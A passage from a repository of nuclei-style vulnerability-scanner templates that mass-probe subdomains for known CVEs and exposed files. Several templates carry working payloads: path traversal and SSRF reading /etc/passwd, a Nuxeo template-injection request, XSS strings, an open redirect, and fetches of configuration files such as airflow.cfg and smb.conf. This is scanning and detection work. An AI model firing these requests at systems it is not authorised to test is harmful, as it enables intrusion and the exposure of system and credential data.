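  name: Django Open Redirect
  author: pikpikcu
  severity: low
  tags: cve,cve2018,django,redirect

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET //www.example.com HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 301
      - type: regex
        regex:
          # Dots are escaped so they match a literal "." only. The unescaped
          # form also accepted hosts such as "wwwXexampleYcom". Single quotes
          # keep the backslashes literal in YAML.
          - '(?m)^(L|l)ocation: (((http|https):)?//(www\.)?)?example\.com'
        part: header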
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-14728.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-14728
2 |
3 | info:
4 | name: Responsive filemanager 9.13.1 - SSRF/LFI
5 | author: madrobot
6 | severity: high
7 | tags: cve,cve2018,ssrf,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | POST /filemanager/upload.php HTTP/1.1
18 | Host: {{Subdomains}}
19 |
20 | fldr=&url=file:///etc/passwd
21 | matchers:
22 | - type: regex
23 | regex:
24 | - "root:[x*]:0:0:"
25 | part: body
26 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-16299.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-16299
2 |
3 | info:
4 | name: WordPress Plugin Localize My Post 1.0 - LFI
5 | author: 0x_Akoko
6 | severity: high
7 | reference: https://www.exploit-db.com/exploits/45439
8 | tags: wordpress,cve2018,cve,lfi
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: regex
24 | regex:
25 | - "root:[x*]:0:0"
26 |
27 | - type: status
28 | status:
29 | - 200
30 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-16341.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-16341
2 |
3 | info:
4 | name: Nuxeo Authentication Bypass Remote Code Execution
5 | author: madrobot
6 | severity: high
7 | description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
8 | tags: cve,cve2018,nuxeo,ssti,rce
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /nuxeo/login.jsp/pwn${313333333333333330+7}.xhtml HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "313333333333333337"
25 | part: body
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-3714.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-3714
2 | info:
3 | name: node-srv Path Traversal
4 | author: madrobot
5 | severity: high
6 | reference: https://hackerone.com/reports/309124
7 | tags: cve,cve2018,nodejs,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /node_modules/../../../../../etc/passwd HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0:"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-3760.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-3760
2 |
3 | info:
4 | name: Rails CVE-2018-3760
5 | author: 0xrudra
6 | severity: high
7 | tags: cve,cve2018,rails,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /assets/file:%2f%2f/etc/passwd HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0:"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-5230.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-5230
2 |
3 | info:
4 | name: Atlassian Confluence Status-List XSS
5 | author: madrobot
6 | severity: medium
7 | tags: cve,cve2018,atlassian,confluence,xss
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - "SRC=\"javascript:alert(1337)\">"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-7251.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-7251
2 |
3 | info:
4 | name: AnchorCMS Error Log Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: cve,cve2018,anchorcms,logs
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /anchor/errors.log HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '"date":'
23 | - '"message":'
24 | - '"trace":['
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-7490.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2018-7490
2 |
3 | info:
4 | name: uWSGI PHP Plugin Directory Traversal
5 | author: madrobot
6 | severity: high
7 | tags: cve,cve2018,uwsgi,php,lfi
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: regex
25 | regex:
26 | - "root:[x*]:0:0:"
27 | part: body
28 |
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-8006.yaml:
--------------------------------------------------------------------------------
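# Detection check for CVE-2018-8006 (reflected XSS in the ActiveMQ admin
# console). The QueueFilter parameter of /admin/queues.jsp carries a marker
# payload. A hit needs that payload reflected unencoded in an HTML response.
id: CVE-2018-8006

info:
  name: Apache ActiveMQ XSS
  author: pdteam
  severity: medium
  tags: cve,cve2018,apache,activemq,xss

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          # URL-decoded form of the payload in the request above. The listing
          # showed only `">`, which occurs in almost any HTML page and would
          # flag hosts that do not reflect the parameter at all. The markup was
          # presumably stripped when the page was rendered.
          - '"><script>alert("1")</script>'
      - type: word
        words:
          - "/html"
        part: header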
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2019-19781.yaml:
--------------------------------------------------------------------------------
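# Detection check for CVE-2019-19781 (directory traversal in Citrix ADC and
# Gateway). The probe requests smb.conf through the /vpn/../vpns/ path. A hit
# needs HTTP 200 and the "[global]" section header in the body.
id: CVE-2019-19781

info:
  name: Citrix ADC Directory Traversal
  author: organiccrap
  severity: high
  description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
  reference: https://support.citrix.com/article/CTX267027
  tags: cve,cve2019,citrix,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
        Host: {{Subdomains}}

    # The status matcher was added. "[global]" on its own also matched error
    # pages or unrelated content that happen to contain the string.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[global]"
        part: body
      - type: status
        status:
          - 200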
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2019-7254-1.yaml:
--------------------------------------------------------------------------------
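# Detection check for CVE-2019-7254 (unauthenticated directory traversal in
# eMerge E3) through the `c` query parameter. A hit needs HTTP 200 and a
# passwd-style root entry in the response.
#
# The id was "CVE-2019-7254 1"; it now matches the file name and has no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: CVE-2019-7254-1

info:
  name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
  author: 0x_Akoko
  severity: high
  reference: https://www.exploit-db.com/exploits/47616
  tags: emerge,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /?c=../../../../../../etc/passwd%00 HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200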
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2019-7254-2.yaml:
--------------------------------------------------------------------------------
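# Detection check for CVE-2019-7254 (unauthenticated directory traversal in
# eMerge E3) through the `tpl` parameter of badge_print_v0.php. A hit needs
# HTTP 200 and a passwd-style root entry in the response.
#
# The id was "CVE-2019-7254 2"; it now matches the file name and has no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: CVE-2019-7254-2

info:
  name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
  author: 0x_Akoko
  severity: high
  reference: https://www.exploit-db.com/exploits/47616
  tags: emerge,lfi

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200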
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2020-13927.yaml:
--------------------------------------------------------------------------------
1 | id: CVE-2020-13927
2 |
3 | info:
4 | name: Unauthenticated Airflow Experimental REST API
5 | author: pdteam
6 | severity: medium
7 | tags: cve,cve2020,apache,airflow,unauth
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /api/experimental/latest_runs HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '"dag_run_url":'
23 | - '"dag_id":'
24 | - '"items":'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/airflow-configuration-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: airflow-configuration-exposure
2 |
3 | info:
4 | name: Apache Airflow Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: exposure,config,airflow,apache
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /airflow.cfg HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - '[core]'
24 | - '[api]'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/amazon-docker-config-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: amazon-docker-config-disclosure
2 |
3 | info:
4 | name: Dockerrun AWS Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure,aws,devops
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /Dockerrun.aws.json HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'AWSEBDockerrunVersion'
24 | - 'containerDefinitions'
25 | condition: and
26 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/ansible-config-disclosure.yaml:
--------------------------------------------------------------------------------
1 | id: ansible-config-disclosure
2 |
3 | info:
4 | name: Ansible Configuration Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /ansible.cfg HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - '[defaults]'
24 | - '[inventory]'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/drupal-install.yaml:
--------------------------------------------------------------------------------
1 | id: drupal-install
2 |
3 | info:
4 | name: Drupal Install
5 | author: NkxxkN
6 | severity: low
7 | tags: exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /install.php?profile=default HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers:
23 | - type: word
24 | words:
25 | - "Choose language | Drupal"
26 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/elmah-log-file.yaml:
--------------------------------------------------------------------------------
1 | id: elmah-log-file
2 |
3 | info:
4 | name: elmah.axd Disclosure
5 | author: shine
6 | severity: medium
7 | tags: logs,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /elmah.axd HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 |
25 | - type: word
26 | words:
27 | - 'Error Log for'
28 |
29 | - type: status
30 | status:
31 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/exposed-hg.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-hg
2 |
3 | info:
4 | name: Exposed HG Directory
5 | author: daffainfo
6 | severity: low
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /.hg/hgrc HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "[paths]"
25 | - "default"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Configuration-Files/exposed-vscode.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-vscode
2 |
3 | info:
4 | name: Exposed VSCode Folders
5 | author: aashiq
6 | severity: low
7 | description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
8 | tags: vscode,exposure
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /.vscode/ HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
21 | matchers:
22 | - type: word
23 | words:
24 | - "Index of /.vscode"
25 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/httpd-config.yaml:
--------------------------------------------------------------------------------
1 | id: httpd-config
2 |
3 | info:
4 | name: Httpd Config file disclosure
5 | author: sheikhrishad
6 | severity: info
7 | tags: config,exposure,httpd
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /httpd.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "LoadModule"
25 | - "# LoadModule"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/lazy-file.yaml:
--------------------------------------------------------------------------------
1 | id: lazy-file-manager
2 |
3 | info:
4 | name: Lazy File Manager
5 | author: amsda
6 | severity: medium
7 | tags: exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /lfm.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
20 | Accept-Encoding: gzip, deflate
21 | Accept: */*
22 | matchers-condition: and
23 | matchers:
24 | - type: status
25 | status:
26 | - 200
27 |
28 | - type: word
29 | words:
30 | - Lazy File Manager
--------------------------------------------------------------------------------
/Templates/Configuration-Files/nagios-status-page-1.yaml:
--------------------------------------------------------------------------------
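# Checks whether the Nagios status CGI at /nagios/cgi-bin/status.cgi is served
# to a request that carries no credentials. A hit is the text
# "Current Network Status" in the response.
#
# The id was "nagios-status-page 1"; it now matches the file name and has no
# space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: nagios-status-page-1

info:
  name: Nagios Current Status Page
  author: dhiyaneshDk
  severity: low
  tags: exposure,nagios
  reference: https://www.exploit-db.com/ghdb/6918

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /nagios/cgi-bin/status.cgi HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers:
      - type: word
        words:
          - Current Network Status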
--------------------------------------------------------------------------------
/Templates/Configuration-Files/nagios-status-page-2.yaml:
--------------------------------------------------------------------------------
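# Checks whether the Nagios status CGI at /cgi-bin/nagios4/status.cgi is served
# to a request that carries no credentials. A hit is the text
# "Current Network Status" in the response.
#
# The id was "nagios-status-page", the same id that nagios-status-page-3.yaml
# uses, so results from the two files could not be told apart. It now matches
# the file name.
id: nagios-status-page-2

info:
  name: Nagios Current Status Page
  author: dhiyaneshDk
  severity: low
  tags: exposure,nagios
  reference: https://www.exploit-db.com/ghdb/6918

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /cgi-bin/nagios4/status.cgi HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers:
      - type: word
        words:
          - Current Network Status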
--------------------------------------------------------------------------------
/Templates/Configuration-Files/nagios-status-page-3.yaml:
--------------------------------------------------------------------------------
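# Checks whether the Nagios status CGI at /cgi-bin/nagios3/status.cgi is served
# to a request that carries no credentials. A hit is the text
# "Current Network Status" in the response.
#
# The id was "nagios-status-page", the same id that nagios-status-page-2.yaml
# uses, so results from the two files could not be told apart. It now matches
# the file name.
id: nagios-status-page-3

info:
  name: Nagios Current Status Page
  author: dhiyaneshDk
  severity: low
  tags: exposure,nagios
  reference: https://www.exploit-db.com/ghdb/6918

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /cgi-bin/nagios3/status.cgi HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers:
      - type: word
        words:
          - Current Network Status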
--------------------------------------------------------------------------------
/Templates/Configuration-Files/opcache-status-exposure-1.yaml:
--------------------------------------------------------------------------------
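# Checks whether an OPcache status page is exposed at /opcache-status/.
# A hit needs both OPcache field names in the response body.
#
# The id was "opcache-status-exposure 1"; it now matches the file name and has
# no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: opcache-status-exposure-1

info:
  name: OPcache Status Exposure
  author: pdteam
  severity: low
  tags: config,exposure

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /opcache-status/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers:
      - type: word
        words:
          # The listing showed "opcache_enabled | " and "opcache_hit_rate | ".
          # The trailing " | " looks like table markup flattened when the page
          # was rendered and would not occur in a raw HTML body, so only the
          # field names are matched. NOTE(review): restore the exact markup
          # from the repository file if a tighter match is wanted.
          - "opcache_enabled"
          - "opcache_hit_rate"
        condition: and
        part: body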
--------------------------------------------------------------------------------
/Templates/Configuration-Files/opcache-status-exposure-2.yaml:
--------------------------------------------------------------------------------
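# Checks whether an OPcache status page is exposed at /php-opcache-status/.
# A hit needs both OPcache field names in the response body.
#
# The id was "opcache-status-exposure 2"; it now matches the file name and has
# no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: opcache-status-exposure-2

info:
  name: OPcache Status Exposure
  author: pdteam
  severity: low
  tags: config,exposure

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /php-opcache-status/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers:
      - type: word
        words:
          # The listing showed "opcache_enabled | " and "opcache_hit_rate | ".
          # The trailing " | " looks like table markup flattened when the page
          # was rendered and would not occur in a raw HTML body, so only the
          # field names are matched. NOTE(review): restore the exact markup
          # from the repository file if a tighter match is wanted.
          - "opcache_enabled"
          - "opcache_hit_rate"
        condition: and
        part: body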
--------------------------------------------------------------------------------
/Templates/Configuration-Files/opcache-status-exposure-3.yaml:
--------------------------------------------------------------------------------
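# Checks whether an OPcache status page is exposed at
# /opcache-status/opcache.php. A hit needs both OPcache field names in the
# response body.
#
# The id was "opcache-status-exposure 3"; it now matches the file name and has
# no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: opcache-status-exposure-3

info:
  name: OPcache Status Exposure
  author: pdteam
  severity: low
  tags: config,exposure

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /opcache-status/opcache.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers:
      - type: word
        words:
          # The listing showed "opcache_enabled | " and "opcache_hit_rate | ".
          # The trailing " | " looks like table markup flattened when the page
          # was rendered and would not occur in a raw HTML body, so only the
          # field names are matched. NOTE(review): restore the exact markup
          # from the repository file if a tighter match is wanted.
          - "opcache_enabled"
          - "opcache_hit_rate"
        condition: and
        part: body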
--------------------------------------------------------------------------------
/Templates/Configuration-Files/perl-status.yaml:
--------------------------------------------------------------------------------
1 | id: perl-status
2 |
3 | info:
4 | name: Apache mod_perl Status Page Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /perl-status HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Apache2::Status"
24 | - "Perl version"
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Configuration-Files/proftpd-config.yaml:
--------------------------------------------------------------------------------
1 | id: proftpd-config
2 |
3 | info:
4 | name: ProFTPD Config file disclosure
5 | author: sheikhrishad
6 | severity: low
7 | tags: config,exposure,proftpd
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /proftpd.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "ProFTPD"
25 | - "ServerName"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/samba-config.yaml:
--------------------------------------------------------------------------------
1 | id: samba-config
2 |
3 | info:
4 | name: Samba config file disclosure
5 | author: sheikhrishad
6 | severity: info
7 | tags: config,exposure,smb
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /smb.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "configuration file"
25 | - "samba"
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/struts-debug-mode.yaml:
--------------------------------------------------------------------------------
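# Checks whether an Apache Struts application returns debug output on its root
# page. A hit needs both debug markers in the response.
id: struts-debug-mode

info:
  name: Apache Struts setup in Debug-Mode
  author: pdteam
  severity: low
  tags: logs,struts,apache,exposure

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        words:
          # The listing showed two empty strings here. An empty word is
          # contained in every response, so the template would report every
          # host. The angle-bracketed markers were presumably stripped when
          # the page was rendered.
          # NOTE(review): the values below follow the upstream
          # struts-debug-mode template; confirm against the repository file.
          - "<debug>"
          - "<struts.actionMapping>"
        condition: and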
--------------------------------------------------------------------------------
/Templates/Configuration-Files/svnserve-config.yaml:
--------------------------------------------------------------------------------
1 | id: svnserve-config
2 |
3 | info:
4 | name: svnserve config file disclosure
5 | author: sheikhrishad
6 | severity: low
7 | tags: config,exposure,svnserve
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /svnserve.conf HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "This file controls the configuration of the svnserve daemon"
25 |
26 | - type: status
27 | status:
28 | - 200
--------------------------------------------------------------------------------
/Templates/Configuration-Files/symfony-profiler.yaml:
--------------------------------------------------------------------------------
1 | id: symfony-profiler
2 |
3 | info:
4 | name: Symfony Profiler
5 | author: pdteam
6 | severity: high
7 | tags: config,exposure
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /_profiler/empty/search/results?limit=10 HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Symfony Profiler"
